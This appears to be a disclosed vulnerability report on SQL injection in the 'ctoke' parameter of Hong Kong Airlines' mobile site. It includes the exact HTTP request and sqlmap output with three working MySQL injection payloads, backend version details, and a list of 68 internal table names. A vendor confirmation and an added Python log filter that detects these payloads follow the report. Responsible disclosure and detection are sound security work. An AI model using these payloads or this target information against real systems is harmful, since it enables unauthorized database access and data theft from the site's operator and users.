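2015-09-19: Details reported to the vendor; awaiting vendor handling
2015-09-21: Vendor confirmed; details disclosed to the vendor only
2015-10-01: Details disclosed to core white hats and experts in related fields
2015-10-11: Details disclosed to regular white hats
2015-10-21: Details disclosed to intern white hats
2015-11-05: Details disclosed to the public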
http://m.hongkongairlines.com/
POST /ci/index.php/state/analysisnew HTTP/1.1
Content-Length: 352
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=3cbe599d5e98cd18672b5c1e25f7c8cd; mode=PC
Host: m.hongkongairlines.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

ctoke=1&language=TW&type=index
The ctoke parameter
32 databases, and error-based injection is supported. Here is some table data to demonstrate the impact:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ctoke (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: ctoke=1' RLIKE (SELECT (CASE WHEN (8725=8725) THEN 1 ELSE 0x28 END)) AND 'dupI'='dupI&language=TW&type=index

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: ctoke=1' AND (SELECT 6763 FROM(SELECT COUNT(*),CONCAT(0x71626a7871,(SELECT (ELT(6763=6763,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvTj'='xvTj&language=TW&type=index

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: ctoke=1' AND (SELECT * FROM (SELECT(SLEEP(5)))giMO) AND 'Udpu'='Udpu&language=TW&type=index
---
web application technology: PHP 5.2.13, Apache 2.2.15
back-end DBMS: MySQL 5.0
Database: aio_umsdata
[68 tables]
+----------------------------------------+
| client_temp                            |
| custom_appkey_log                      |
| custom_appmap                          |
| custom_data                            |
| custom_datasurce                       |
| custom_event_dim_app                   |
| custom_event_label                     |
| custom_event_preview                   |
| custom_event_table_log                 |
| custom_group                           |
| custom_item                            |
| custom_optimize_logs                   |
| custom_standard_channel                |
| razor_alert                            |
| razor_alertdetail                      |
| razor_cell_towers                      |
| razor_channel                          |
| razor_channel_product                  |
| razor_ci_sessions                      |
| razor_clientdata                       |
| razor_clientusinglog                   |
| razor_config                           |
| razor_device                           |
| razor_errorlog                         |
| razor_event_defination                 |
| razor_eventdata                        |
| razor_login_attempts                   |
| razor_markevent                        |
| razor_mccmnc                           |
| razor_networktype                      |
| razor_persistdata                      |
| razor_platform                         |
| razor_plugin_hkchannel                 |
| razor_product                          |
| razor_product_category                 |
| razor_product_version                  |
| razor_productfiles                     |
| razor_provisional_clientdata           |
| razor_provisional_clientusinglog       |
| razor_provisional_errorlog             |
| razor_report_basic_event               |
| razor_report_event_layer               |
| razor_report_expression_event          |
| razor_report_expression_event_resource |
| razor_report_item                      |
| razor_report_multiple_event            |
| razor_report_multiple_event_resource   |
| razor_reportlayout                     |
| razor_system_tag                       |
| razor_target                           |
| razor_targetevent                      |
| razor_url_visit_count_time             |
| razor_user2product                     |
| razor_user2role                        |
| razor_user_autologin                   |
| razor_user_count                       |
| razor_user_device                      |
| razor_user_device_token                |
| razor_user_eventdata                   |
| razor_user_permissions                 |
| razor_user_profiles                    |
| razor_user_resources                   |
| razor_user_roles                       |
| razor_user_segmentation                |
| razor_user_tag                         |
| razor_user_tag_defination              |
| razor_users                            |
| razor_wifi_towers                      |
+----------------------------------------+
I did not go on to dump the data~
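
An added example, not part of the original report or of any vendor code: a request-log filter that flags POSTs to the reported endpoint whose ctoke value matches one of the three techniques in the sqlmap output above. The log line layout, the expected shape of ctoke and the function names are assumptions; the sample lines are constructed from the payloads quoted in the report.

```python
import re
from urllib.parse import parse_qs

ENDPOINT = "/ci/index.php/state/analysisnew"  # path from the request above
# Assumption: a legitimate ctoke is a short alphanumeric token (the page only shows ctoke=1).
EXPECTED_CTOKE = re.compile(r"[A-Za-z0-9]{1,64}")
# One signature per technique listed in the sqlmap output above.
TECHNIQUES = [
    ("boolean-based blind", re.compile(r"\bRLIKE\b.*\bCASE\s+WHEN\b", re.I | re.S)),
    ("error-based", re.compile(r"\bFLOOR\s*\(\s*RAND\s*\(.*\bGROUP\s+BY\b", re.I | re.S)),
    ("time-based blind", re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I)),
]

def classify_ctoke(body):
    """Return findings for the ctoke field of one urlencoded POST body."""
    findings = []
    # parse_qs percent-decodes, so encoded payloads are matched in decoded form.
    for value in parse_qs(body, keep_blank_values=True).get("ctoke", []):
        if EXPECTED_CTOKE.fullmatch(value):
            continue  # matches the allowlist, nothing to report
        hits = [name for name, rx in TECHNIQUES if rx.search(value)]
        findings.extend(hits or ["unexpected characters"])
    return findings

def scan(log_lines):
    """Return [(source_ip, findings)] for flagged requests to ENDPOINT."""
    flagged = []
    for line in log_lines:
        ip, path, body = line.split(" ", 2)
        findings = classify_ctoke(body) if path == ENDPOINT else []
        if findings:
            flagged.append((ip, findings))
    return flagged

# Constructed log, "<ip> <path> <raw POST body>"; payloads are the ones quoted above.
SAMPLE_LOG = [
    "192.0.2.10 " + ENDPOINT + " ctoke=1&language=TW&type=index",
    "192.0.2.66 " + ENDPOINT + " ctoke=1' RLIKE (SELECT (CASE WHEN (8725=8725) THEN 1 ELSE 0x28 END)) AND 'dupI'='dupI&language=TW&type=index",
    "192.0.2.66 " + ENDPOINT + " ctoke=1' AND (SELECT 6763 FROM(SELECT COUNT(*),CONCAT(0x71626a7871,(SELECT (ELT(6763=6763,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvTj'='xvTj&language=TW&type=index",
    "192.0.2.66 " + ENDPOINT + " ctoke=1%27%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))giMO)%20AND%20%27Udpu%27=%27Udpu&language=TW&type=index",
    "192.0.2.77 " + ENDPOINT + " ctoke=1'&language=TW&type=index",
    "192.0.2.10 /index.php ctoke=1'&language=TW&type=index",
]

if __name__ == "__main__":
    for ip, findings in scan(SAMPLE_LOG):
        print(ip, findings)
```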
Severity: High
Vulnerability Rank: 13
Confirmed: 2015-09-21 09:32
Thank you, we will arrange remediation immediately.
None yet